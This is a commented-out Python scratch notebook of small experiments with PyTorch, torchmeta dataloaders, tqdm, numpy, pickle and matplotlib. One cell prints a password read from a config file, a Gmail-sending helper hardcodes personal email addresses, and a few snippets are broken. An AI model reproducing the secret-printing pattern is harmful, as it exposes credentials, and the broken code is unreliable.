# # log_dir = make_dirpath_current_datetime_hostname('~', '_jupyter')
# # print(log_dir)
# # log_dir = make_dirpath_current_datetime_hostname('~').expanduser()
# # print(log_dir)
# #
# # string = "geeks for geeks geeks geeks geeks"
# # # Prints the string by replacing geeks by Geeks
# # print(string.replace("geeks", "Geeks"))
# #
# # log_dir = make_dirpath_current_datetime_hostname('~', '_jupyter', True)
# # print(log_dir)
#
# # %%
#
# # adding keys to empty dic
#
# d = {}
# d['a'] = 3
# print(d)
#
# # %%
#
# # unpack list?
#
# (a, b, c) = [1, 2, 3]
# print(a)
#
#
# # %%
#
# ## kwargs
#
# def f(*args, **kwargs):
# print(args)
# print(kwargs)
#
#
# f()
# f(1, 2, 3, a=1, b=2, c=3)
#
# # %%
#
# #
# # import json
# #
# # from pathlib import Path
# #
# # p = Path('~/').expanduser()
# # with open(p) as f:
# # data = json.load(f)
# # print(data)
# # print(data['password'])
#
# # %%
#
# import subprocess
#
# from subprocess import Popen, PIPE, STDOUT
#
# cmd = 'ls /etc/fstab /etc/non-existent-file'
# p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True)
# output = p.stdout.read()
# print(output)
#
# # %%
#
# import sys
#
# print('a')
#
# print(sys.stdout)
#
# # %%
#
# # from pathlib import Path
# #
# #
# # def send_email(subject, message, destination, password_path=None):
# # """ Send an e-mail from with message to destination email.
# #
# # NOTE: if you get an error with google gmails you might need to do this:
# # https://stackoverflow.com/questions/16512592/login-credentials-not-working-with-gmail-smtp
# # To use an app password:
# # https://stackoverflow.com/questions/60975490/how-does-one-send-an-e-mail-from-python-not-using-gmail
# #
# # Arguments:
# # message {str} -- message string to send.
# # destination {str} -- destination email (as string)
# # """
# # from socket import gethostname
# # from email.message import EmailMessage
# # import smtplib
# # import json
# # import sys
# #
# # server = smtplib.SMTP('smtp.gmail.com', 587)
# # smtplib.stdout = sys.stdout
# # server.starttls()
# # with open(password_path) as f:
# # config = json.load(f)
# # server.login('slurm.miranda@gmail.com', config['password'])
# #
# # # craft message
# # msg = EmailMessage()
# #
# # # message = f'{message}\nSend from Hostname: {gethostname()}'
# # # msg.set_content(message)
# # msg['Subject'] = subject
# # msg['From'] = 'slurm.miranda@gmail.com'
# # msg['To'] = destination
# # # send msg
# # server.send_message(msg)
# #
# #
# # ##
# # print("-------> HELLOWWWWWWWW")
# # p = Path('~/automl-meta-learning/automl/experiments/pw_app.config.json').expanduser()
# # send_email(subject='TEST: send_email2', message='MESSAGE', destination='brando.science@gmail.com', password_path=p)
#
# # %%
#
# """
# Demo of the errorbar function, including upper and lower limits
# """
# import numpy as np
# import matplotlib.pyplot as plt
#
# import matplotlib as mpl
#
# mpl.rcParams["errorbar.capsize"] = 3
#
# # https://stackoverflow.com/questions/61415955/why-dont-the-error-limits-in-my-plots-show-in-matplotlib
#
# # example data
# x = np.arange(0.5, 5.5, 0.5)
# y = np.exp(-x)
# xerr = 0.1
# yerr = 0.2
# ls = 'dotted'
#
# fig = plt.figure()
# ax = fig.add_subplot(1, 1, 1)
#
# # standard error bars
# plt.errorbar(x, y, xerr=xerr, yerr=yerr, ls=ls, color='blue')
#
# # including upper limits
# uplims = np.zeros(x.shape)
# uplims[[1, 5, 9]] = True
# plt.errorbar(x, y + 0.5, xerr=xerr, yerr=yerr, uplims=uplims, ls=ls,
# color='green')
#
# # including lower limits
# lolims = np.zeros(x.shape)
# lolims[[2, 4, 8]] = True
# plt.errorbar(x, y + 1.0, xerr=xerr, yerr=yerr, lolims=lolims, ls=ls,
# color='red')
#
# # including upper and lower limits
# plt.errorbar(x, y + 1.5, marker='o', ms=8, xerr=xerr, yerr=yerr,
# lolims=lolims, uplims=uplims, ls=ls, color='magenta')
#
# # including xlower and xupper limits
# xerr = 0.2
# yerr = np.zeros(x.shape) + 0.2
# yerr[[3, 6]] = 0.3
# xlolims = lolims
# xuplims = uplims
# lolims = np.zeros(x.shape)
# uplims = np.zeros(x.shape)
# lolims[[6]] = True
# uplims[[3]] = True
# plt.errorbar(x, y + 2.1, marker='o', ms=8, xerr=xerr, yerr=yerr,
# xlolims=xlolims, xuplims=xuplims, uplims=uplims, lolims=lolims,
# ls='none', mec='blue', capsize=0, color='cyan')
#
# ax.set_xlim((0, 5.5))
# ax.set_title('Errorbar upper and lower limits')
# plt.show()
#
# # %%
#
# from types import SimpleNamespace
# from pathlib import Path
# from pprint import pprint
#
# args = SimpleNamespace()
# args.data_root = "~/automl-meta-learning/data/miniImagenet"
#
# args.data_root = Path(args.data_root).expanduser()
#
# print(args)
#
# # pprint(dir(args.data_root))
# print(args.data_root.name)
# print('miniImagenet' in args.data_root.name)
#
# # %%
#
# ## sampling N classes for len(meta-set)
# # In sampling without replacement, each sample unit of
# # the population has only one chance to be selected in the sample.
# # because you are NOT replacing what you removed.
#
# import random
#
# N = 5
# len_meta_set = 64
# sample = random.sample(range(0, len_meta_set), N)
#
# print(sample)
#
# for i, n in enumerate(sample):
# print(f'i={i}\nn={n}\n')
#
#
# # %%
#
# # iterator https://www.programiz.com/python-programming/iterator
#
# class Counter:
#
# def __init__(self, max=0):
# self.max = max # returns up to and including that number
#
# def __iter__(self):
# self.n = 0
# return self
#
# def __next__(self):
# if self.n <= self.max:
# current_count = self.n
# self.n += 1
# print(f'current_count = {current_count}')
# print(f'self.n = {self.n}')
# print(self.n is current_count)
# return current_count
# else:
# raise StopIteration
#
#
# ## test it
#
# counter = iter(Counter(max=0))
# for count in counter:
# print(f'count = {count}')
#
# # %%
#
# from tqdm import tqdm
#
# print(tqdm)
#
# lst = range(3)
# print(type(lst))
#
# with tqdm(iter(lst), total=5) as tlist:
# print(f'tlist = {type(tlist)}')
# for i in tlist:
# print(i)
#
# # %%
#
# from tqdm import tqdm
#
#
# class Plus2:
#
# def __init__(self, max=0):
# self.max = max # returns up to and including that number
#
# def __iter__(self):
# self.it = 0
# self.tot = 0
# return self
#
# def __next__(self):
# if self.it <= self.max:
# self.it += 1
# self.tot += 2
# return self.tot
# else:
# raise StopIteration
#
# def __len__(self):
# return self.max
#
#
# ##
# counter = iter(Plus2(max=int(100000)))
# with tqdm(counter, total=len(counter)) as tqcounter:
# for idx, pow2 in enumerate(tqcounter):
# print()
# print(f'idx = {idx}')
# print(f'powd2 = {pow2}')
# pass
#
# # %%
#
# from tqdm import tqdm
#
# for i in tqdm(range(int(9e6))):
# pass
#
# # %%
#
# from tqdm import tqdm
#
# import time
#
# with tqdm(range(int(5))) as trange:
# for i in trange:
# print(f'\ni = {i}')
# print('done\n')
# time.sleep(1)
# pass
#
# # %%
#
# # zip, it aligns elements in one list to elements in the other
#
# l1 = [0, 1, 2]
# l2 = ['a', 'b', 'c']
#
# print(list(zip(l1, l2)))
#
# # %%
#
# from tqdm import tqdm
# import time
#
# lst = range(10000000)
# total = 2
#
# with tqdm(lst, total=total) as tlst:
# i = 0
# for _, element in enumerate(tlst):
# print(f'\n->i = {i}\n')
# time.sleep(0.2)
# i += 1
# if i >= total:
# break
#
# print('\n--> DONE \a')
#
# # %%
#
# from tqdm import tqdm
# import time
#
# lst = range(10000000)
# total = 2
#
# with tqdm(lst, total=total) as tlst:
# for idx, element in enumerate(tlst):
# print(f'\n->idx = {idx}\n')
# time.sleep(0.2)
# if idx >= total:
# break
#
# print('\n--> DONE \a')
#
# # %%
#
# from tqdm import tqdm
# import time
#
# lst = range(10000000)
# total = 2
#
# with tqdm(range(total)) as tcounter:
# lst = iter(lst)
# for idx, element in enumerate(tcounter):
# print(f'\n->idx = {idx}\n')
# time.sleep(0.2)
#
# print('\n--> DONE \a')
#
# # %%
#
# # Question: Do detached() tensors track their own gradients seperately?
# # Ans: Yes!
# # https://discuss.pytorch.org/t/why-is-the-clone-operation-part-of-the-computation-graph-is-it-even-differentiable/67054/11
#
# import torch
#
# a = torch.tensor([2.0], requires_grad=True)
# b = a.detach()
# b.requires_grad = True
#
# la = (5.0 - a) ** 2
# la.backward()
# print(f'a.grad = {a.grad}')
#
# lb = (6.0 - b) ** 2
# lb.backward()
# print(f'b.grad = {b.grad}')
#
# # %%
#
# import torch
# import torch.nn as nn
#
# from collections import OrderedDict
#
# params = OrderedDict([
# ('fc0', nn.Linear(in_features=4, out_features=4)),
# ('ReLU0', nn.ReLU()),
# ('fc1', nn.Linear(in_features=4, out_features=1))
# ])
# mdl = nn.Sequential(params)
#
# print(params)
# print(mdl._parameters)
# print(params == params)
# print(mdl._parameters == params)
# print(mdl._modules)
#
# print()
# for name, w in mdl.named_parameters():
# print(name, w.norm(2))
#
# print()
# # mdl._modules['fc0'] = nn.Linear(10,11)
# mdl._modules['fc0']
#
# for name, w in mdl.named_parameters():
# print(name, w.norm(2))
#
# # %%
#
# ## Q: are parameters are in computation graph?
# import torch
# import torch.nn as nn
# from torchviz import make_dot
#
# from collections import OrderedDict
#
# fc0 = nn.Linear(in_features=3, out_features=1)
# params = [('fc0', fc0)]
# mdl = nn.Sequential(OrderedDict(params))
#
# x = torch.randn(1, 3)
# y = torch.randn(1)
#
# l = (mdl(x) - y) ** 2
#
# # make_dot(l,{x:'x',y:'y','fc0':fc0})
# print(fc0.weight)
# print(fc0.bias)
# print(fc0.weight.to_tens)
# print()
# # make_dot(l,{x:'x',y:'y','fc0':fc0})
# make_dot(l, {'x': x, 'y': y})
# make_dot(l)
#
# # %%
#
# '''
# expand
# '''
#
# import torch
#
# x = torch.randn([2, 3, 4, 5])
#
# # h_0 of shape (num_layers * num_directions, batch, hidden_size)
# h = torch.randn([1, 4, 8])
#
# x_mean = x.mean()
# print(x_mean.size())
# print(x_mean)
# x = x_mean.expand_as(h)
# print(x.size())
# print(x)
#
# # %%
#
# import torch
#
# use_cuda = torch.cuda.is_available()
# device = torch.device("cuda" if use_cuda else "cpu")
# print(device)
# type(device)
# print(device == 'cpu')
# device.type
#
# # %%
#
# # THIS WORKS
#
# from torch.utils.tensorboard import SummaryWriter
#
# from pathlib import Path
#
# # log_dir (string) – Save directory location.
# # Default is runs/CURRENT_DATETIME_HOSTNAME, which changes after each run.
#
# tb = SummaryWriter()
# tb.add_scalar('loss', 111)
#
# # %%
#
# from torch.utils.tensorboard import SummaryWriter
#
# from pathlib import Path
#
#
# def CURRENT_DATETIME_HOSTNAME(comment=''):
# # if not log_dir:
# import socket
# import os
# from datetime import datetime
# current_time = datetime.now().strftime('%b%d_%H-%M-%S')
# log_dir = os.path.join('runs', current_time + '_' + socket.gethostname() + comment)
# return Path(log_dir)
#
#
# # log_dir (string) – Save directory location.
# # Default is runs/CURRENT_DATETIME_HOSTNAME, which changes after each run.
# # tensorboard --logdir=runs
# log_dir = (Path('~/automl-meta-learning/') / CURRENT_DATETIME_HOSTNAME()).expanduser()
# print(log_dir)
# tb = SummaryWriter(log_dir=log_dir)
# tb.add_scalar('loss', 15)
#
# # %%
#
# # download mini-imagenet automatically
#
# # from torchvision.utils import download_and_extract_archive
#
# import torchvision.utils as utils
#
# print(utils)
# # print(download_and_extract_archive)
#
# # %%
#
# # torch concat, https://pytorch.org/docs/stable/torch.html#torch.cat
# # Concatenates the given sequence of seq tensors in the given dimension.
# # All tensors must either have the same shape (except in the concatenating dimension) or be empty.
# import torch
#
# g1 = torch.randn(3, 2)
# g2 = torch.randn(4, 2)
#
# g3 = torch.randn(4, 2, 3)
#
# grads = [g1, g2]
# print(g1.view(-1).size())
# print(g2.view(-1).size())
# print(g3.view(-1).size())
# # print(g3.view(-1))
#
# grads = torch.cat(grads, dim=0)
# print(grads)
# print(grads.size())
# print(grads.mean())
# print(grads.std())
#
# # torch stack, https://pytorch.org/docs/stable/torch.html#torch.stack
# # Concatenates sequence of tensors along a new dimension.
# # All tensors need to be of the same size.
# # torch.stack([g1,g2], dim=0)
#
# # %%
#
# import torch
#
# a = torch.tensor([1, 2, 3.], requires_grad=True)
# a_detached = a.detach()
# print(a_detached.is_leaf)
# a_detached_sum = a.sum()
# print(a_detached_sum.is_leaf)
# d = a_detached_sum.detach()
# print(d.is_leaf)
#
# # %%
#
# import torch
#
# from types import SimpleNamespace
# from pathlib import Path
# from pprint import pprint
#
# x = torch.empty([1, 2, 3])
# print(x.size())
#
# args = SimpleNamespace()
# args.data_root = "~/automl-meta-learning/data/miniImagenet"
#
# # n1313361300001299.jpg
# args.data_root = Path(args.data_root).expanduser()
#
# # %%
#
# import torch
#
# CHW = 3, 12, 12
# x = torch.randn(CHW)
# y = torch.randn(CHW)
#
# new = [x, y]
# new = torch.stack(new)
# print(x.size())
# print(new.size())
#
# # %%
#
# print('a');
# print('b')
#
# # %%
#
# # conver list to tensor
#
# import torch
#
# x = torch.tensor([1, 2, 3.])
# print(x)
#
# # %%
#
# from torchvision.transforms import Compose, Resize, ToTensor
#
# import torchmeta
# from torchmeta.datasets.helpers import miniimagenet
#
# from pathlib import Path
# from types import SimpleNamespace
#
# from tqdm import tqdm
#
# ## get args
# args = SimpleNamespace(episodes=5, n_classes=5, k_shot=5, k_eval=15, meta_batch_size=1, n_workers=4)
# args.data_root = Path("~/automl-meta-learning/data/miniImagenet").expanduser()
#
# ## get meta-batch loader
# train_transform = Compose([Resize(84), ToTensor()])
# dataset = miniimagenet(
# args.data_root,
# ways=args.n_classes,
# shots=args.k_shot,
# test_shots=args.k_eval,
# meta_split='train',
# download=False)
# dataloader = torchmeta.utils.data.BatchMetaDataLoader(
# dataset,
# batch_size=args.meta_batch_size,
# num_workers=args.n_workers)
#
# with tqdm(dataset):
# print(f'len(dataloader)= {len(dataloader)}')
# for episode, batch in enumerate(dataloader):
# print(f'episode = {episode}')
# train_inputs, train_labels = batch["train"]
# print(f'train_labels[0] = {train_labels[0]}')
# print(f'train_inputs.size() = {train_inputs.size()}')
# pass
# if episode >= args.episodes:
# break
#
# # %%
#
# # zip tensors
#
# import torch
#
# x = torch.tensor([1., 2., 3.])
# y = torch.tensor([1, 2, 3])
#
# print(list(zip(x, y)))
#
# xx = torch.randn(2, 3, 84, 84)
# yy = torch.randn(2, 3, 32, 32)
#
# print(len(list(zip(xx, yy))))
#
# # %%
#
# x = 2
# print(x)
#
# # %%
#
# ## sinusioid function
# print('Starting Sinusioid cell')
#
# from torchmeta.toy import Sinusoid
# from torchmeta.utils.data import BatchMetaDataLoader
# from torchmeta.transforms import ClassSplitter
#
# # from tqdm import tqdm
#
# batch_size = 16
# shots = 5
# test_shots = 15
# # dataset = torchmeta.toy.helpers.sinusoid(shots=shots, test_shots=tes_shots)
# metaset_dataset = Sinusoid(num_samples_per_task=shots + test_shots, num_tasks=100, noise_std=None)
# splitter_metset_dataset = ClassSplitter(
# metaset_dataset,
# num_train_per_class=shots,
# num_test_per_class=test_shots,
# shuffle=True)
# dataloader = BatchMetaDataLoader(splitter_metset_dataset, batch_size=batch_size, num_workers=4)
#
# print(f'batch_size = {batch_size}')
# print(f'len(dataset) = {len(metaset_dataset)}')
# print(f'len(dataloader) = {len(dataloader)}\n')
# for batch_idx, batch in enumerate(dataloader):
# print(f'batch_idx = {batch_idx}')
# train_inputs, train_targets = batch['train']
# test_inputs, test_targets = batch['test']
# print(f'train_inputs.shape = {train_inputs.shape}')
# print(f'train_targets.shape = {train_targets.shape}')
# print(f'test_inputs.shape = {test_inputs.shape}')
# print(f'test_targets.shape = {test_targets.shape}')
# if batch_idx >= 1: # halt after 2 iterations
# break
#
# print('DONE\a')
#
# # %%
#
# ## notes of torchmeta
#
# from pathlib import Path
# import torchmeta
#
# # meta-set: creates collection of data-sets, D_meta = {D_1, ... Dn}
# print('\n-- Sinusoid(MetaDataset)')
# metaset_sinusoid = torchmeta.toy.Sinusoid(num_samples_per_task=10, num_tasks=1_000_000, noise_std=None)
# print(f'type(metaset_sinusoid) = {type(metaset_sinusoid)}')
# print(f'len(metaset_sinusoid) = {len(metaset_sinusoid)}')
# print(f'metaset_sinusoid = {metaset_sinusoid}')
#
# # this is still a data set but helps implement forming D_i
# # i.e. the N-way, K-shot tasks/datasets we need.
# print('\n-- MiniImagenet(CombinationMetaDataset)')
# data_path = Path('~/data').expanduser()
# metaset_miniimagenet = torchmeta.datasets.MiniImagenet(data_path, num_classes_per_task=5, meta_train=True,
# download=True)
# print(f'type(metaset_miniimagenet) = {type(metaset_miniimagenet)}')
# print(f'len(metaset_miniimagenet) = {len(metaset_miniimagenet)}')
# print(f'metaset_miniimagenet = {metaset_miniimagenet}')
#
# # Splits the data-sets inside the meta-set into support/train & query/test sets
# dataset = metaset_miniimagenet
# dataset = torchmeta.transforms.ClassSplitter(dataset, num_train_per_class=1, num_test_per_class=15, shuffle=True)
# print(dataset)
#
# # %%
#
# import torch
# import torch.nn as nn
# import numpy as np
#
# x = np.random.uniform()
#
# x = torch.rand(1)  # needs a size; a 1-d tensor so nn.Linear(1, 1) accepts it
#
# print(x)
#
# l = nn.Linear(1, 1)
#
# y = l(x)
#
# print(y)
#
# # %%
#
# # saving tensors for my data set
# import torch
# import torch.nn as nn
#
# from collections import OrderedDict
#
# from pathlib import Path
#
# # N x's of size D=1 in an interval
# Din, Dout = 3, 2
# num_samples = 5
# lb, ub = -1, 1
# X = (ub - lb) * torch.rand([num_samples, Din]) + lb # rand gives uniform in [0,1) range
#
# # N y's of size D=1 (from output of NN)
# f = nn.Sequential(OrderedDict([
# ('f1', nn.Linear(Din, Dout)),
# ('out', nn.SELU())
# ]))
#
# # fill cnn with Gaussian
# mu1, std1 = 5, 7.5
# f.f1.weight.data.normal_(mu1, std1)
# f.f1.bias.data.normal_(mu1, std1)
#
# # get outputs
# Y = f(X)
# print(Y)
#
# # save tensors and cnn
# # https://stackoverflow.com/questions/1466000/difference-between-modes-a-a-w-w-and-r-in-built-in-open-function
# db = {
# 'X': X,
# 'Y': Y
# }
# path = Path(f'~/data/tmp/SinData_mu1{mu1}_std1{std1}/').expanduser()
# path.mkdir(parents=True, exist_ok=True)
# with open(path / 'db', 'wb') as file:  # create/truncate the file; binary mode is required by torch.save
# torch.save(db, file)
#
# # %%
#
# # saving data in numpy
#
# import numpy as np
# import pickle
# from pathlib import Path
#
# path = Path('~/data/tmp/').expanduser()
# path.mkdir(parents=True, exist_ok=True)
#
# lb, ub = -1, 1
# num_samples = 5
# x = np.random.uniform(low=lb, high=ub, size=(1, num_samples))
# y = x ** 2 + x + 2
#
# # using save (to npy), savez (to npz)
# np.save(path / 'x', x)
# np.save(path / 'y', y)
# np.savez(path / 'db', x=x, y=y)
# with open(path / 'db.pkl', 'wb') as db_file:
# pickle.dump(obj={'x': x, 'y': y}, file=db_file)
#
# ## using loading npy, npz files
# x_loaded = np.load(path / 'x.npy')
# y_load = np.load(path / 'y.npy')
# db = np.load(path / 'db.npz')
# with open(path / 'db.pkl', 'rb') as db_file:
# db_pkl = pickle.load(db_file)
#
# print(x is x_loaded)
# print(x == x_loaded)
# print(x == db['x'])
# print(x == db_pkl['x'])
# print('done')
#
# # %%
#
# import numpy as np
# from pathlib import Path
#
# path = Path('~/data/tmp/').expanduser()
# path.mkdir(parents=True, exist_ok=True)
#
# lb, ub = -1, 1
# num_samples = 5
# x = np.random.uniform(low=lb, high=ub, size=(1, num_samples))
# y = x ** 2 + x + 2
#
# np.save(path / 'x', x)
# np.save(path / 'y', y)
#
# x_loaded = np.load(path / 'x.npy')
# y_load = np.load(path / 'y.npy')
#
# print(x is x_loaded) # False
# print(x == x_loaded) # [[ True True True True True]]
#
# # %%
#
# # saving torch tensors
#
# import torch
# import torch.nn as nn
# import torchvision
#
# from pathlib import Path
# from collections import OrderedDict
#
# path = Path('~/data/tmp/').expanduser()
# path.mkdir(parents=True, exist_ok=True)
#
# tensor_a = torch.rand(2, 3)
# tensor_b = torch.rand(1, 3)
#
# db = {'a': tensor_a, 'b': tensor_b}
#
# torch.save(db, path / 'torch_db')
# loaded = torch.load(path / 'torch_db')
# print(loaded['a'] == tensor_a)
# print(loaded['b'] == tensor_b)
#
# # testing if ToTensor() screws things up
# lb, ub = -1, 1
# N, Din, Dout = 3, 1, 1
# x = torch.distributions.Uniform(low=lb, high=ub).sample((N, Din))
# print(x)
#
# f = nn.Sequential(OrderedDict([
# ('f1', nn.Linear(Din, Dout)),
# ('out', nn.SELU())
# ]))
# y = f(x)
#
# transform = torchvision.transforms.transforms.ToTensor()
# y_proc = transform(y)
# print(y_proc)
#
# # %%
#
# # union dictionaries, https://stackoverflow.com/questions/38987/how-do-i-merge-two-dictionaries-in-a-single-expression-in-python
#
# d1 = {'a': 1, 'b': 2.5}
# d2 = {'b': 2, 'c': 3, 'd': 4}
# d = {**d1, **d2}
# # duplicates resolved in favour of d2
# print(d)
#
# # %%
#
# # generating uniform variables
#
# import numpy as np
#
# num_samples = 3
# Din = 1
# lb, ub = -1, 1
#
# xn = np.random.uniform(low=lb, high=ub, size=(num_samples, Din))
# print(xn)
#
# import torch
#
# sampler = torch.distributions.Uniform(low=lb, high=ub)
# r = sampler.sample((num_samples, Din))
#
# print(r)
#
# r2 = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples, Din))
#
# print(r2)
#
# # process input (this cell only imports numpy and torch above, so bring in nn, OrderedDict and define Dout)
# import torch.nn as nn
# from collections import OrderedDict
# Dout = 1
# f = nn.Sequential(OrderedDict([
# ('f1', nn.Linear(Din, Dout)),
# ('out', nn.SELU())
# ]))
# Y = f(r2)
# print(Y)
#
# # %%
#
# # sampling from normal distribution in torch
#
# import torch
#
# num_samples = 3
# Din = 1
# mu, std = 0, 1
# x = torch.distributions.normal.Normal(loc=mu, scale=std).sample((num_samples, Din))
#
# print(x)
#
# # %%
#
# # creating data and running through a nn and saving it
#
# import torch
# import torch.nn as nn
#
# from pathlib import Path
# from collections import OrderedDict
#
# import numpy as np
#
# import pickle
#
# path = Path('~/data/tmp/').expanduser()
# path.mkdir(parents=True, exist_ok=True)
#
# num_samples = 3
# Din, Dout = 1, 1
# lb, ub = -1, 1
#
# x = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples, Din))
#
# f = nn.Sequential(OrderedDict([
# ('f1', nn.Linear(Din, Dout)),
# ('out', nn.SELU())
# ]))
# y = f(x)
#
# # save data torch to numpy
# x_np, y_np = x.detach().cpu().numpy(), y.detach().cpu().numpy()
# np.savez(path / 'db', x=x_np, y=y_np)
#
# print(x_np)
# # save model
# with open('db_saving_seq', 'wb') as file:
# pickle.dump({'f': f}, file)
#
# # load model
# with open('db_saving_seq', 'rb') as file:
# db = pickle.load(file)
# f2 = db['f']
#
# # test that it outputs the right thing
# y2 = f2(x)
#
# y_eq_y2 = y == y2
# print(y_eq_y2)
#
# db2 = {'f': f, 'x': x, 'y': y}
# torch.save(db2, path / 'db_f_x_y')
#
# print('Done')
#
# db3 = torch.load(path / 'db_f_x_y')
# f3 = db3['f']
# x3 = db3['x']
# y3 = db3['y']
# yy3 = f3(x3)
#
# y_eq_y3 = y == y3
# print(y_eq_y3)
#
# y_eq_yy3 = y == yy3
# print(y_eq_yy3)
#
# # %%
#
# # test for saving everything with torch.save
#
# import torch
# import torch.nn as nn
#
# from pathlib import Path
# from collections import OrderedDict
#
# import numpy as np
#
# import pickle
#
# path = Path('~/data/tmp/').expanduser()
# path.mkdir(parents=True, exist_ok=True)
#
# num_samples = 3
# Din, Dout = 1, 1
# lb, ub = -1, 1
#
# x = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples, Din))
#
# f = nn.Sequential(OrderedDict([
# ('f1', nn.Linear(Din, Dout)),
# ('out', nn.SELU())
# ]))
# y = f(x)
#
# # save data torch to numpy
# x_np, y_np = x.detach().cpu().numpy(), y.detach().cpu().numpy()
# db2 = {'f': f, 'x': x_np, 'y': y_np}
# torch.save(db2, path / 'db_f_x_y')
# # np.savetxt(path / 'output.csv', y_np) # for csv
#
# db3 = torch.load(path / 'db_f_x_y')
# f3 = db3['f']
# x3 = db3['x']
# y3 = db3['y']
# xx = torch.tensor(x3)
# yy3 = f3(xx)
#
# print(yy3)
#
# # %%
#
# # my saving code for synthetic data, nvm using torch.save for everything
#
# # import torch
# # import torch.nn as nn
# #
# # from pathlib import Path
# # from collections import OrderedDict
# #
# # import numpy as np
# #
# # path = Path('~/data/tmp/').expanduser()
# # path.mkdir(parents=True, exist_ok=True)
# #
# # num_samples = 3
# # Din, Dout = 1, 1
# # lb, ub = -1, 1
# #
# # x = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples, Din))
# #
# # f = nn.Sequential(OrderedDict([
# # ('f1', nn.Linear(Din,Dout)),
# # ('out', nn.SELU())
# # ]))
# # y = f(x)
# #
# # # save data torch to numpy
# # x_np, y_np = x.detach().cpu().numpy(), y.detach().cpu().numpy()
# # np.savez(path / 'data', x=x_np, y=y_np)
# #
# # # save model
# # torch.save(f,path / 'f')
#
# # %%
#
# import torch
#
# import torch.nn as nn
#
# from collections import OrderedDict
#
# num_samples = 3
# Din, Dout = 1, 1
# lb, ub = -1, 1
#
# x = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples, Din))
#
# hidden_dim = [(Din, 20), (20, 20), (20, 20), (20, 20), (20, Dout)]
# f = nn.Sequential(OrderedDict([
# ('fc1;l1', nn.Linear(hidden_dim[0][0], hidden_dim[0][1])),
# ('relu2', nn.ReLU()),
# ('fc2;l1', nn.Linear(hidden_dim[1][0], hidden_dim[1][1])),
# ('relu2', nn.ReLU()),
# ('fc3;l1', nn.Linear(hidden_dim[2][0], hidden_dim[2][1])),
# ('relu3', nn.ReLU()),
# ('fc4;l1', nn.Linear(hidden_dim[3][0], hidden_dim[3][1])),
# ('relu4', nn.ReLU()),
# ('fc5;final;l2', nn.Linear(hidden_dim[4][0], hidden_dim[4][1]))
# ]))
#
# y = f(x)
#
# print(y)
#
# section_label = [1] * 4 + [2]
# print(section_label)
#
# # %%
#
# # get list of paths to task
# # https://stackoverflow.com/questions/973473/getting-a-list-of-all-subdirectories-in-the-current-directory
# # https://stackoverflow.com/a/44228436/1601580
#
# from pathlib import Path
# from glob import glob
#
# meta_split = 'train'
# data_path = Path('~/data/LS/debug/fully_connected_NN_mu1_1.0_std1_2.5_mu2_1.0_std2_0.5/')
# data_path = (data_path / meta_split).expanduser()
#
# # with path lib
# tasks_folder = [f for f in data_path.iterdir() if f.is_dir()]
#
# assert ('f_avg' not in tasks_folder)
#
# len_folder = len(tasks_folder)
# print(len_folder)
# print(tasks_folder)
# print()
#
# # with glob
# p = str(data_path) + '/*/'
# print(p)
# tasks_folder = glob(p)
#
# assert ('f_avg' not in tasks_folder)
#
# len_folder = len(tasks_folder)
# print(len_folder)
# print(tasks_folder)
# print()
#
# # with glob and negation
# print(set(glob(str(data_path / "f_avg"))))
# tasks_folder = set(glob(str(data_path / '*'))) - set(glob(str(data_path / "f_avg")))
#
# assert ('f_avg' not in tasks_folder)
#
# len_folder = len(tasks_folder)
# print(len_folder)
# print(tasks_folder)
# print()
#
# # %%
#
# # looping through metasets
#
# from torchmeta.utils.data import BatchMetaDataLoader
# from torchmeta.transforms import ClassSplitter
# from torchmeta.toy import Sinusoid
#
# from tqdm import tqdm
#
# # get data set
# dataset = Sinusoid(num_samples_per_task=25, num_tasks=30)
# shots, test_shots = 5, 15
# # get metaset
# metaset = ClassSplitter(
# dataset,
# num_train_per_class=shots,
# num_test_per_class=test_shots,
# shuffle=True)
# # get meta-dataloader
# batch_size = 16
# num_workers = 0
# meta_dataloader = BatchMetaDataLoader(metaset, batch_size=batch_size, num_workers=num_workers)
# epochs = 2
#
# print(f'batch_size = {batch_size}')
# print(f'len(metaset) = {len(metaset)}')
# print(f'len(meta_dataloader) = {len(meta_dataloader)}')
# with tqdm(range(epochs)) as tepochs:
# for epoch in tepochs:
# for batch_idx, batch in enumerate(meta_dataloader):
# print(f'\nbatch_idx = {batch_idx}')
# train_inputs, train_targets = batch['train']
# test_inputs, test_targets = batch['test']
# print(f'train_inputs.shape = {train_inputs.shape}')
# print(f'train_targets.shape = {train_targets.shape}')
# print(f'test_inputs.shape = {test_inputs.shape}')
# print(f'test_targets.shape = {test_targets.shape}')
#
# # %%
#
# from tqdm import tqdm
#
# import time
#
# with tqdm(range(5)) as trange:
# for t in trange:
# print(t)
# time.sleep(1)
#
# # %%
#
#
# import torch
# import torch.nn as nn
#
# l1 = torch.tensor([1, 2, 3.]) ** 0.5
# l2 = torch.tensor([0, 0, 0.0])
# mse = nn.MSELoss()
# loss = mse(l1, l2)
# print(loss)
#
# # %%
#
# import numpy as np
#
# x = np.arange(0, 10)
# print(x)
#
# print(x.max())
# print(x.min())
# print(x.mean())
# print(np.median(x))
#
# # %%
#
# x = torch.randn(3)
# print(x)
# print(x.argmax(-1))
#
# # %%
#
# # testing accuracy function
# # https://discuss.pytorch.org/t/calculating-accuracy-of-the-current-minibatch/4308/11
# # https://stackoverflow.com/questions/51503851/calculate-the-accuracy-every-epoch-in-pytorch
#
# import torch
# import torch.nn as nn
#
# D = 1
# true = torch.tensor([0, 1, 0, 1, 1]).reshape(5, 1)
# print(f'true.size() = {true.size()}')
#
# batch_size = true.size(0)
# print(f'batch_size = {batch_size}')
# x = torch.randn(batch_size, D)
# print(f'x = {x}')
# print(f'x.size() = {x.size()}')
#
# mdl = nn.Linear(D, 1)
# logit = mdl(x)
# _, pred = torch.max(logit.data, 1)
#
# print(f'logit = {logit}')
#
# print(f'pred = {pred}')
# print(f'true = {true}')
#
# acc = (true.squeeze(-1) == pred).sum().item()  # squeeze so both are shape (5,); (5, 1) == (5,) would broadcast to (5, 5)
# print(f'acc = {acc}')
#
# # %%
#
# # https://towardsdatascience.com/understanding-dimensions-in-pytorch-6edf9972d3be
# # dimension
# # https://discuss.pytorch.org/t/how-does-one-get-the-predicted-classification-label-from-a-pytorch-model/91649/4?u=brando_miranda
# """
# Dimension reduction: an op like sum or max collapses a chosen dimension by combining (or selecting from)
# the elements along it.
